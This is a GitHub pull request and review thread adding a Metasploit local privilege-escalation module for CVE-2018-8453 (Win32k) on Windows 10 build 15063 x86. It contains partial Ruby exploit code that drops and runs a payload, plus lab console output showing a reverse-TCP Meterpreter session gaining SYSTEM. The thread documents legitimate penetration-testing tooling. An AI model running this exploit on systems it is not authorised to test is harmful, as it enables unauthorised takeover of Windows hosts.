### PR TITLE
Add module for cve-2018-8453

### PR DESCRIPTION
**Pull request by jrobles-r7**
Add local Windows Privilege escalation module for cve-2018-8453.
PoC code is from x86 version of https://github.com/ze0r/cve-2018-8453-exp
The author [has given permission](https://github.com/ze0r/cve-2018-8453-exp/issues/1#issuecomment-505249256) to use their code in msf as well.

## Verification

List the steps needed to make sure this thing works

- [x] Get a non-SYSTEM meterpreter session on Win10 v1703 x86
- [x] `use exploit/windows/local/cve_2018_8453_win32k_priv_esc`
- [x] `set session <session>`
- [x] `exploit`
- [x] Get a SYSTEM session

### CODE REVIEW

**Comment by wvu-r7** [comment]
Removed `tests` label. Reapply if I was wrong. Thanks.

File: modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,102 @@
...
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
+
+
```
Comment (wvu-r7) [inline modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: Extra blank line or new style?

File: modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb [hunk 2]
```diff
@@ -0,0 +1,102 @@
...
+      Windows 10, Windows 10 Servers.
+
+      This module is tested against Windows 10 v1703 x86.
+    },
+    'License'         => MSF_LICENSE,
+    'Author'          => [
+        'ze0r',           # Exploit analysis and PoC
+        'Kaspersky Lab',  # Vulnerability discovery/detection
+        'Jacob Robles'    # Metasploit
+      ],
```
Comment (wvu-r7) [inline modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: New bracket indentation style?

File: modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb [hunk 3]
```diff
@@ -0,0 +1,102 @@
...
+    'Name'            => 'Windows NtUserSetWindowFNID Win32k User Callback',
+    'Description'     => %q{
+      An elevation of privilege vulnerability exists in Windows when the Win32k component
+      fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability."
+      This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows
+      Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,
+      Windows 10, Windows 10 Servers.
+
+      This module is tested against Windows 10 v1703 x86.
+    },
```
Comment (wvu-r7) [inline modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: Did you want to indent this brace?

File: modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb [hunk 4]
```diff
@@ -0,0 +1,102 @@
...
+
+  def target_info
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+
+    unless sysinfo['OS'].start_with?('Windows 10 (Build 15063)') && sysinfo['Architecture'] == 'x86'
+      fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
+    end
+  end
+
+  def write_file_to_target(fname, data)
```
Comment (wvu-r7) [inline modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: This is nice.

File: modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb [hunk 5]
```diff
@@ -0,0 +1,102 @@
...
+
+    tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
+    payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
+    vprint_status("Uploading payload #{tmp_payload}")
+    register_file_for_cleanup(payload_rpath)
+
+    command = "\"#{exe_rpath}\" \"#{payload_rpath}\""
+
+    vprint_status("Executing command: #{command}")
+    session.sys.process.execute(command, nil, {'Hidden' => false})
```
Comment (wvu-r7) [inline modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: I think this is what you were talking about with `cmd_exec` being hidden when you needed it to be visible?

**Review by wvu — APPROVED** [review]
Another clean submission. Very nice. Only a couple questions but otherwise no changes required.

File: modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb (hunk 5 above)
Comment (jrobles-r7) [reply modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: Yes

File: modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb [hunk 6]
```diff
@@ -11,24 +11,23 @@ class MetasploitModule < Msf::Exploit::Local
...
 
-      This module is tested against Windows 10 v1703 x86.
-    },
+        This module is tested against Windows 10 v1703 x86.
+      },
     'License'         => MSF_LICENSE,
     'Author'          => [
         'ze0r',           # Exploit analysis and PoC
         'Kaspersky Lab',  # Vulnerability discovery/detection
-        'Jacob Robles'    # Metasploit
```
Comment (wvu-r7) [inline modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: I didn't notice that you wrote Metasploit. :joy:

Comment (jrobles-r7) [reply modules/exploits/windows/local/cve_2018_8453_win32k_priv_esc.rb]: Lol. Yeah. Kind of a big error on my part

**Comment by wchen-r7** [comment]
So Jacob and I had a little discussion about this pull request, and I requested at least these changes:

* The exploit binary needs to be compiled with `/MT` for the runtime library setting.
* The offsets are rather specific to build 15063 on Win 10. We want to allow that to be more configurable for the user, also ship with pre-configured ones to cover common builds (example: images downloadable from MSDN)

After that, as long as the exploit works, I can take over the rest and land this.

**Comment by wchen-r7** [comment]
It works!

```
msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > show options

Module options (exploit/windows/local/cve_2018_8453_win32k_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.138.1     yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 10 v1703 (Build 15063) x86


msf5 exploit(windows/local/cve_2018_8453_win32k_priv_esc) > run

[*] Started reverse TCP handler on 172.16.138.1:5555 
[+] Exploit finished, wait for privileged payload execution to complete.
[*] Sending stage (179779 bytes) to 172.16.138.129
[*] Meterpreter session 2 opened (172.16.138.1:5555 -> 172.16.138.129:49674) at 2019-07-15 02:35:24 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

**Comment by wchen-r7** [comment]
A little minor changes here and there and then I should be able to land it. Thanks for waiting!

**Comment by wchen-r7** [comment]
# Release Notes

This adds a local Windows Privilege escalation module for cve-2018-8453. It specifically works for x86 Windows 10 build 15063.

**Pull request merged**